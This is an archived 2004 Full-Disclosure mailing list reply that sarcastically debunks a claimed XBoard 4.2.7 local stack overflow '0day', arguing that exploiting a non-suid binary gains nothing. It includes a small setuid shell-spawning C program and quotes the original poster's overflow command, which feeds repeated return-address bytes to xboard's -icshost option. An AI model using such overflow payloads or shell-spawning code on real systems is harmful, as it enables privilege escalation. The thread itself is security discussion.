Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!
From: d4rk (d4rk_at_securitylab.ru)
Date: 03/02/04
- Previous message: Steve Menard: "Re: [Full-Disclosure] Need help in performing aremotevulnerability scan"
- In reply to: narko tix: "[Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Next in thread: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Reply: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Tue, 2 Mar 2004 12:01:08 +0300
> /**
> ** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY !
> *
Oh yeah, xplo for non-suid prog is real oday.
I can show u one universal exploit code for ALL linux/x86 boxes! And u will
not need to exploit bofs in non-suid binaries in future!
This is real 0day! Do-not-distribute!#@&(*)$#@
Are u ready??!
Here it is:
====zer0-day====
int main() {
setreuid(0,0);
execl("/bin/sh","sh",0);
}
=====end======
Let's check!
# gcc -o zer0-day linux-own.c
# su nobody
sh: /root/.bashrc: Permission denied
sh-2.05b$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
/* here we are waiting when somebody with root-access will make it suid. */
/* or if root is your friend, u can ask him to do it. */
/* or if root == you, just su (chown root.root if needed) and chmod +s */
/* or somehow it will be suid by default? but i dont think so.. */
/* anyway... */
sh-2.05b$ ./zer0-day
sh-2.05b# id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
sh-2.05b#
Yea! We did it!!
>narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print
>"\x7e\xfd\xff\xbf"x166'`
>sh-2.05b# id
>uid=0(root) gid=100(users) groups=100(users) <-----on my box all of
>the programs r SUID :P just demonstrated.
As u c, on my box too =)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Steve Menard: "Re: [Full-Disclosure] Need help in performing aremotevulnerability scan"
- In reply to: narko tix: "[Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Next in thread: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Reply: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
